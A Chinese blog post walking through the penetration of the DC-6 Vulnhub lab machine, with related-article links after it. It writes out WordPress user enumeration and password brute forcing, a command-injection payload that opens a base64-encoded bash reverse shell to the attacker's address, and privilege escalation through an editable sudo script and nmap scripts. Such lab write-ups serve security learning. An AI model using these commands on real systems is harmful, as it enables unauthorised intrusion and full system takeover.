DC6靶机渗透

最新推荐文章于 2024-07-29 09:22:32 发布
最新推荐文章于 2024-07-29 09:22:32 发布
阅读量132 收藏 2
点赞数 4
文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63523232/article/details/139954116
版权

DC6靶机渗透

信息搜集

netdiscover -i eth0 -r 192.168.165.0/24

在这里插入图片描述

找到靶机192.168.165.46

nmap扫描

在这里插入图片描述

发现有域名重定向

修改hosts文件指向域名

echo "192.168.165.46 wordy" >> /etc/hosts

在这里插入图片描述

windows下路径C:\Windows\System32\drivers\etc\hosts

需要管理员权限,复制到桌面修改后在复制回去

在这里插入图片描述

爆破密码

wpscan扫描wordpress

wpscan --url http://wordy/ --enumerate u

扫出来用户放到user.txt中

admin
sarah
graham
mark
jens

用kali自带rockyou爆破,以下代码用于节省时间

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

wpscan --url http://wordy/ -U user.txt -P passwords.txt -t 10

扫出来,mark的密码helpdesk01

在这里插入图片描述

登录用户找漏洞

扫描目录

dirsearch -u http://wordy -e*

得到登录路径wp-login.php

在这里插入图片描述

登录后有个Activity monitor插件,在Tools出可以执行命令

在这里插入图片描述

在这里插入图片描述

直接反弹shell

127.0.0.1;bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE2NS4yMTYvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}'

在这里插入图片描述

提权

获取交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述

suid提权没找到可用的

find / -user root -perm -4000 -print 2>/dev/null

查看有/bin/bash的用户

在这里插入图片描述

到/home目录查看每个用户的文件

在这里插入图片描述

发现jens下有backups.sh,mark下有stuff

查看stuff下的文件

在这里插入图片描述

得到了graham的密码

登录

在这里插入图片描述

sudo -l找到backups.sh

在这里插入图片描述

查看一下是压缩命令

在这里插入图片描述

修改一下命令

echo "/bin/bash" >> /home/jens/backups.sh

在这里插入图片描述

运行

sudo -u jens /home/jens/backups.sh

在这里插入图片描述

切换到了jens

sudo -l发现nmap

在这里插入图片描述

nmap提权

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

在这里插入图片描述

在这里插入图片描述

一个人的愿望
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DC-6靶机渗透测试
读书 买花 长大
04-22 433
DC-6
DC-6靶机渗透
m0_62008601的博客
05-31 559
攻击机kali:192.168.56.102 靶机dc-6:192.168.56.107 为确保两台服务器在同一网段下,我这里dc-6的网络设置为仅主机网络,kali的设置为桥接模式,这样才能通过kali扫描出dc-6靶机的ip。 配置好环境之后就可以开始操作了 扫描存活的主机 扫描靶机开放的端口 看到开放了80端口和22端口,浏览器进行访问 无法访问,这个问题和前面的一个靶机类似,存在域名解析错误,知道了域名为wordy,就可以去hosts文件(在/etc/hosts).
DC6 靶机渗透
weixin_41082546的博客
08-23 568
靶场下载链接: Download: http://www.five86.com/downloads/DC-6.zip Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip Download (Torrent): https://download.vulnhub.com/dc/DC-6.zip.torrent ( Magnet...
DC-6靶机详细渗透过程
MRS_jianai的博客
12-21 795
DC-6靶机详细渗透过程
DC6靶机渗透测试
Huangshanyoumu的博客
04-17 574
环境版本: VMware pro 16 Kali 2021.1(虚拟机) DC-6(虚拟机) 一、信息收集 1.主机发现 arp-scan -l 2.端口扫描 nmap -A -p- 192.168.2.170 发现开启了 22 端口:ssh服务 80 端口:http服务,wordpress框架 域名:wordy,映射 ip:192.168.2.170 二、漏洞扫描 1.访问 web 服务 发现 ip 自动跳转为域名,但是无法解析 在 /etc/hosts 文件中添加解析 echo '192.1
dc-6 靶机渗透学习
..
03-21 1731
信息收集 扫描当前网段,确定存活主机 nmap -sP 192.168.202.0/24 对靶机进行端口扫描,发现80、22端口开放 nmap -A -p- -v 192.168.202.145 访问80端口,发现和dc-2一样的问题,会自动跳转到域名,需要手动在hosts文件加入ip对应关系。 修改后重新访问80端口,用Wappalyzer扫描一下框架,发现是WordPress 根据靶机作者的提示,大致就知道是通过爆破来做 用专门的CM...
对DC-6靶机进行渗透测试
zll___的博客
03-20 753
对DC-6靶机进行渗透测试
Vulnhub | DC6靶机 渗透测试
菜鸡一枚
03-02 130
Vulnhub-DC系列第六个靶机,wpscan爆破wordpress后台、命令执行漏洞(RCE)、nmap提权
DC-4靶机渗透
weixin_45349299的博客
12-21 994
开放的端口:22 => ssh服务 ---- OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)80 => http服务 ---- nginx 1.15.10扫描出来的网站目录。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC3靶机渗透测试练习
10-05
DC3靶机渗透测试练习 DC3靶机渗透测试练习是网络安全领域中的一个重要实践项目,旨在帮助安全测试人员和渗透测试人员提高自己的技能和经验。本文将详细介绍 DC3靶机渗透测试练习的各个阶段和步骤,以及每个阶段的...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8352
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
《“微软蓝屏”敲响警钟:网络安全与系统稳定何去何从》
2302_77186925的博客
07-24 1725
“微软蓝屏”事件暴露了网络安全哪些问题
非科班出身的你,如何转行web安全工程师?零基础入门到精通,收藏这一篇就够了
最新发布
Python_paipai的博客
07-29 310
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。那么,转行web安全工程师,你需要掌握哪些技能呢?对web安全工程师很感兴趣。对现在的工作没有热情。
“微软蓝屏“事件暴露了网络安全哪些问题?
程序员-张师傅
07-23 945
微软蓝屏事件,尤其是2024年7月19日发生的全球性Windows系统崩溃事件,带来了多方面的深刻教训。
hackbox靶机渗透
10-15
好的,关于hackbox靶机渗透,我可以提供一些基本的信息和建议。首先,hackbox是一个虚拟机靶机,可以用于练习渗透测试技能。在渗透测试过程中,需要进行信息收集、漏洞扫描、漏洞利用等步骤。以下是一些可能有用的工具和技术: 1. Nmap:用于端口扫描和服务识别。 2. Metasploit:用于漏洞利用和后渗透。 3. Hydra:用于暴力破解密码。 4. Burp Suite:用于Web应用程序渗透测试。 5. SQL注入、XSS等常见漏洞的利用方法。 当然,这只是一些基本的工具和技术,实际的渗透测试需要根据具体情况进行选择和使用。此外,还需要注意法律和道德问题,不要进行未经授权的渗透测试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值